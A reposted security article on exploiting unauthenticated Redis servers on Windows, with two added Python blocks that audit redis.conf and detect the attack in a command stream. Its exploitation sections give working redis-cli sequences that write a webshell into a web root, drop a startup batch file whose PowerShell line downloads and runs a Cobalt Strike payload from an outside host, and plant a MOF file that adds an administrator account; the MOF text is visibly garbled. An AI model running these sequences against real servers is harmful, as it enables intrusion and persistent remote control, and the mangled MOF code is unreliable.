2025-01-19 Update From: SLTechnology News&Howtos (Network Security)
Shulou (Shulou.com) 05/31 Report
This article explains what causes unauthorized access to Redis in a Windows environment, something most people know little about; it is shared here for reference.
Causes of unauthorized Redis access
1. Redis is bound to 0.0.0.0 on the default port 6379 and is exposed directly to the public network, with no firewall restricting trusted sources.
2. No password authentication is set, so the Redis service can be logged into remotely without a password.
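The two causes above are both visible in redis.conf, so the quickest check is to audit the file rather than probe the port. The following auditor is an added example written for this article, not code from the article or from the Redis project; the two configuration texts are constructed samples, the 16-character password threshold and the finding strings are my own choices, and the expected-directive names (bind, protected-mode, requirepass, rename-command) are real Redis directives.

```python
"""Audit a redis.conf for the two root causes named above (bound to every
interface, no password) plus the CONFIG command that turns an open port
into an arbitrary file write. Added example; config texts are constructed.
"""
import shlex
from typing import List, Tuple

# Constructed sample: the configuration the article describes.
WEAK_CONF = """
bind 0.0.0.0
port 6379
protected-mode no
"""

# Constructed sample: the same server locked down.
HARDENED_CONF = """
bind 127.0.0.1
port 6379
protected-mode yes
requirepass "Use-A-Long-Random-Secret-Here-32chars"
rename-command CONFIG ""
"""


def parse_redis_conf(text: str) -> List[Tuple[str, List[str]]]:
    """Return (directive, args) pairs in file order, skipping comments and blanks.

    redis.conf is a whitespace-separated "keyword arg arg ..." format that
    allows double-quoted strings, so shlex handles the quoting.
    """
    entries = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = shlex.split(line)
        entries.append((parts[0].lower(), parts[1:]))
    return entries


def audit_redis_conf(text: str) -> List[str]:
    """Return one finding string per weak setting; an empty list means none found."""
    last = {}       # last occurrence wins for single-valued directives
    renamed = {}    # rename-command <original> <new-name>
    for key, args in parse_redis_conf(text):
        if key == "rename-command" and len(args) == 2:
            renamed[args[0].upper()] = args[1]
        else:
            last[key] = args

    findings = []

    # Cause 1: bound to every interface (a missing bind line means the same).
    bind = last.get("bind")
    if bind is None or any(a in ("0.0.0.0", "*", "::") for a in bind):
        findings.append("bind: listens on all interfaces; restrict to 127.0.0.1 or an internal address")

    # protected-mode is the safety net when bind is broad and no password is set.
    if last.get("protected-mode", ["yes"])[0].lower() != "yes":
        findings.append("protected-mode: disabled; unauthenticated remote clients are accepted")

    # Cause 2: no password, or one short enough to guess (16 is this example's threshold).
    pw = last.get("requirepass")
    if not pw or not pw[0]:
        findings.append("requirepass: not set; anyone who can reach the port can run commands")
    elif len(pw[0]) < 16:
        findings.append("requirepass: password shorter than 16 characters")

    # CONFIG SET dir/dbfilename followed by SAVE is the write-anywhere primitive;
    # renaming CONFIG to the empty string disables it entirely.
    if renamed.get("CONFIG", "CONFIG") != "":
        findings.append('rename-command: CONFIG still reachable; consider rename-command CONFIG ""')

    return findings


if __name__ == "__main__":
    for label, conf in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(label, audit_redis_conf(conf) or "no findings")
```

Run it against the real file with `audit_redis_conf(open("redis.conf").read())`; on the constructed weak sample it reports all four findings, on the hardened sample none.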
Vulnerability hazards
1. Information disclosure; an attacker can also maliciously run flushall to wipe the data.
2. Lua code can be executed through eval, or a backdoor file can be written to disk through the data backup (snapshot) function.
3. If Redis runs as root, an attacker can write an SSH public key into the root account and log in to the victim server directly over SSH.
Utilization mode 01 - writing a webshell
1. Obtain the absolute path of the web root and write the webshell directly into it.
redis-cli.exe -h redis-server -p 6379
redis-server:6379> CONFIG SET dir c:/phpstudy/www
OK
redis-server:6379> CONFIG SET dbfilename shell.php
OK
redis-server:6379> set x ""
OK
redis-server:6379> save
OK
Then simply access shell.php directly.
Utilization mode 02 - writing a startup item
The startup-item directory on Windows is
C:/Users/Administrator/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/startup/
There are many ways to write it; here Cobalt Strike is used for the demonstration.
First start the CS team server with the following command:
root@kali:~/cobaltstrike4.1# ./teamserver csip 123456
When starting the client, enter the password and the address.
Add a Listener.
Select Attacks > Web Drive-by > Scripted Web Delivery and choose the Listener just added.
Click Launch to generate the following code:
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://cs address:80/a'))"
Save it as 1.bat.
There are two small details. First, the dump file itself has content, so the command must be preceded by a line break; in testing, two newline sequences (\r\n\r\n) were needed for it to run properly. Second, the command contains double quotes, which must be escaped.
redis-cli.exe -h target ip -p 6379
redis target ip:6379> config set dir "C:/Users/Administrator/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/startup/"
OK
redis target ip:6379> CONFIG SET dbfilename 1.bat
OK
redis target ip:6379> set x "\r\n\r\npowershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://csip:80/a'))\"\r\n\r\n"
OK
(Note that the double quotes here are escaped, and that the Windows path contains a space in "Start Menu", so the dir value is quoted.)
redis target ip:6379> save
OK
Checking the server's startup items shows that the command was written normally.
After the target machine is restarted, the beacon comes online successfully.
Utilization mode 03 - writing a MOF file
If the web directory cannot be obtained and the machine cannot be restarted, MOF privilege escalation can be used; its environmental limitation is that it only works on Windows Server 2003.
A brief description of how MOF privilege escalation works:
MOF ("Managed Object Format") is a Windows system file (at c:/windows/system32/wbem/mof/nullevt.mof) that monitors process creation and termination every five seconds. In practice the technique relies on having MySQL root privileges, then using those privileges to write the MOF we uploaded; after a certain period the MOF is executed. The MOF contains a VBS script, and that VBS is mostly a cmd command that adds an administrator user.
In other words, MOF files in the c:/windows/system32/wbem/mof/ directory are executed automatically every 5 seconds, so permissions can be obtained without restarting the machine.
First, save the following code as an admin.txt file:
# pragma namespace ("\\.\ root\ subscription") instance of _ EventFilter as $EventFilter {EventNamespace = "Root\ Cimv2"; Name = "filtP2"; Query = "Select * From _ InstanceModificationEvent"Where TargetInstance Isa" Win32_LocalTime "" And TargetInstance.Second = 5 "; QueryLanguage =" WQL "; instance of ActiveScriptEventConsumer as $Consumer {Name =" consPCSV2 "; ScriptingEngine =" JScript "; ScriptText =" var WSH = new ActiveXObject ("WScript.Shell") nWSH.run ("net.exe user admin admin / add"); Instance of _ _ FilterToConsumerBinding {Consumer = $Consumer; Filter = $EventFilter;}
The command executed here adds a user named admin.
Then run
(echo -e "\n\n"; cat admin.txt; echo -e "\n\n") > foo.txt
Change to the redis directory and run the following command
After a while, you will see that the user has been added successfully. (The local test was unsuccessful: writing into the mof folder succeeded, but the file went straight to the bad folder.)
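All three Windows modes above, webshell, startup item and MOF, rest on one primitive: CONFIG SET dir, CONFIG SET dbfilename, then SAVE, so that the snapshot lands as an attacker-named file in an attacker-chosen directory. That sequence is what a defender should watch for. The detector below is an added example, not code from the article; it consumes lines in the format printed by `redis-cli MONITOR` (`<timestamp> [<db> <client-addr>] "cmd" "arg" ...`), tracks per-client state, and raises an alert when a snapshot is triggered after the directory was moved outside the expected data directory or the filename was changed to something that is not an .rdb file. The sample lines, the `EXPECTED_DIR_PREFIX` value and the placeholder payload string are constructed for this example.

```python
"""Flag the CONFIG SET dir / CONFIG SET dbfilename / SAVE sequence in a Redis
command stream. Added example; the MONITOR lines below are constructed.
"""
import re
import shlex
from dataclasses import dataclass, field
from typing import Dict, Iterable, List, Optional, Tuple

# redis-cli MONITOR prints: <unix-ts> [<db> <ip:port>] "cmd" "arg" ...
MONITOR_LINE = re.compile(r'^(?P<ts>\d+\.\d+) \[(?P<db>\d+) (?P<addr>\S+)\] (?P<rest>.*)$')

# Where this deployment keeps its dump files (constructed value for the example);
# any dir outside it is an attempt to drop a file somewhere more interesting.
EXPECTED_DIR_PREFIX = "c:/redis/"
DUMP_EXTENSIONS = (".rdb",)

# Constructed sample stream: one client replays the sequence from the article
# (with a placeholder instead of a payload), two other clients behave normally.
MONITOR_SAMPLE = """\
1700000000.100000 [0 192.168.1.50:51000] "CONFIG" "SET" "dir" "c:/phpstudy/www"
1700000000.200000 [0 192.168.1.50:51000] "CONFIG" "SET" "dbfilename" "shell.php"
1700000000.300000 [0 192.168.1.50:51000] "set" "x" "PAYLOAD-PLACEHOLDER"
1700000000.400000 [0 192.168.1.50:51000] "save"
1700000001.000000 [0 10.0.0.7:40000] "GET" "session:42"
1700000002.000000 [0 10.0.0.9:40100] "CONFIG" "SET" "dbfilename" "dump-backup.rdb"
1700000002.500000 [0 10.0.0.9:40100] "bgsave"
"""


@dataclass
class Alert:
    addr: str
    ts: str
    reason: str


@dataclass
class ClientState:
    suspicious: List[str] = field(default_factory=list)


def parse_monitor_line(line: str) -> Optional[Tuple[str, str, List[str]]]:
    """Return (timestamp, client address, argv) or None for a non-matching line."""
    m = MONITOR_LINE.match(line.strip())
    if not m:
        return None
    # Arguments are double-quoted with \" escapes, which shlex unquotes for us.
    return m.group("ts"), m.group("addr"), shlex.split(m.group("rest"))


def detect_snapshot_file_write(lines: Iterable[str]) -> List[Alert]:
    """Alert when a client triggers SAVE/BGSAVE after redirecting the dump file."""
    clients: Dict[str, ClientState] = {}
    alerts: List[Alert] = []
    for line in lines:
        parsed = parse_monitor_line(line)
        if not parsed or not parsed[2]:
            continue
        ts, addr, argv = parsed
        cmd = argv[0].upper()
        state = clients.setdefault(addr, ClientState())

        if cmd == "CONFIG" and len(argv) >= 4 and argv[1].upper() == "SET":
            key, value = argv[2].lower(), argv[3]
            if key == "dir":
                normalized = value.replace("\\", "/").lower()
                if not normalized.startswith(EXPECTED_DIR_PREFIX):
                    state.suspicious.append(f"dir moved to {value}")
            elif key == "dbfilename":
                if not value.lower().endswith(DUMP_EXTENSIONS):
                    state.suspicious.append(f"dbfilename set to non-rdb name {value}")
        elif cmd in ("SAVE", "BGSAVE") and state.suspicious:
            # The snapshot is what actually writes the file; alert once per sequence.
            alerts.append(Alert(addr, ts, "snapshot after: " + "; ".join(state.suspicious)))
            state.suspicious.clear()
    return alerts


if __name__ == "__main__":
    for alert in detect_snapshot_file_write(MONITOR_SAMPLE.splitlines()):
        print(f"{alert.ts} {alert.addr}: {alert.reason}")
```

MONITOR itself costs throughput on a busy instance, so in production the same logic is better fed from a proxy or network capture of the Redis protocol; the parser only depends on the line shape, not on MONITOR being the source. On the constructed sample it raises exactly one alert, for the client that moved the dump into the web root and renamed it shell.php, and stays quiet for the client that merely renamed its dump to another .rdb file.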
An additional way of using it under Linux:
At WCTF2019 Final, which ended on July 7, 2019, Pavel Toporkov of LC/BC presented a new form of RCE exploitation against Redis at the sharing session.
https://2018.zeronights.ru/wp-content/uploads/materials/15-redis-post-exploitation.pdf
The script used is at
https://github.com/LoRexxar/redis-rogue-server
In a real production environment there are many practical problems:
Redis usually holds a fairly large amount of data; after a shell is written into a file, PHP refuses to execute it because the file is too large.
On Ubuntu and Debian, writing a scheduled task to get a reverse shell does not work.
Writing /etc/passwd overwrites the original /etc/passwd; it cannot be changed and then changed back.
Running 'KEYS *' in a production environment will bring the service down directly.
© 2024 shulou.com SLNews company. All rights reserved.